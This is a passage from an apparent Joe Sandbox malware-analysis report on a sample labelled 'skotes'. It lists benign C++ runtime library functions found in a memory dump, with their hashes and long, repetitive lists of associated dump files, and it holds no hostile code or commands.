                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2885714658-0
                                                                                                                                                                                                                                          • Opcode ID: d62b73c3aff8ea02eea97b8c0b7a89144f65b92b3e46204b315fdad119abebe9
                                                                                                                                                                                                                                          • Instruction ID: 7991f7f44bd5bff5e13efc1066fc091e057fb92994a3df3fb5cc94c3cf0e6a41
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d62b73c3aff8ea02eea97b8c0b7a89144f65b92b3e46204b315fdad119abebe9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB41AFB0A042449ACF54FFA084557ED7BA76F11304F1440ADE9426F3C3EB759E86CB6A
                                                                                                                                                                                                                                          Function 006BE7AF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 006BE7D7
                                                                                                                                                                                                                                            • Part of subcall function 006BE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 006BE577
                                                                                                                                                                                                                                            • Part of subcall function 006BE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 006BE599
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006BE854
                                                                                                                                                                                                                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 006BE860
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 006BE86F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 006BE879
                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 006BE8AD
                                                                                                                                                                                                                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 006BE8B5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1924466884-0
                                                                                                                                                                                                                                          • Opcode ID: 87d4a69d66b930c865a05a2a78937122fc1a8a551ce397b87276fdb0d41bb46d
                                                                                                                                                                                                                                          • Instruction ID: 557ccfca34fc9a50744cf84214ffd86a28cfcf367ef5c322389f96a301220ccc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87d4a69d66b930c865a05a2a78937122fc1a8a551ce397b87276fdb0d41bb46d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF411A75A002049FCB45EF64C495AEDB7BAFF48310F1580A9ED499B382DB70A981CF91
                                                                                                                                                                                                                                          Function 006A6E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Mtx_unlock.LIBCPMT ref: 006A6ED1
                                                                                                                                                                                                                                          • std::_Rethrow_future_exception.LIBCPMT ref: 006A6F22
                                                                                                                                                                                                                                          • std::_Rethrow_future_exception.LIBCPMT ref: 006A6F32
                                                                                                                                                                                                                                          • __Mtx_unlock.LIBCPMT ref: 006A6FD5
                                                                                                                                                                                                                                          • __Mtx_unlock.LIBCPMT ref: 006A70DB
                                                                                                                                                                                                                                          • __Mtx_unlock.LIBCPMT ref: 006A7116
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1997747980-0
                                                                                                                                                                                                                                          • Opcode ID: 6fb8eb4de598f682f12c36cc28cb91d0d645904717911d977f664747187e663e
                                                                                                                                                                                                                                          • Instruction ID: 3cf41ed2e8374937db2e48fe06afc6fee80af5ae72a04f0b0467666c99e9f0c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fb8eb4de598f682f12c36cc28cb91d0d645904717911d977f664747187e663e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC1CFB19047049FDF21EFA4C845BAABBF6AF16310F04456DE81697782EB31AD04CF61
                                                                                                                                                                                                                                          Function 006B44DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006B4538
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006B456C
                                                                                                                                                                                                                                          • Hash.LIBCMT ref: 006B45D5
                                                                                                                                                                                                                                          • Hash.LIBCMT ref: 006B45E5
                                                                                                                                                                                                                                            • Part of subcall function 006B9C41: std::bad_exception::bad_exception.LIBCMT ref: 006B9C63
                                                                                                                                                                                                                                          • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 006B474B
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006B47A4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
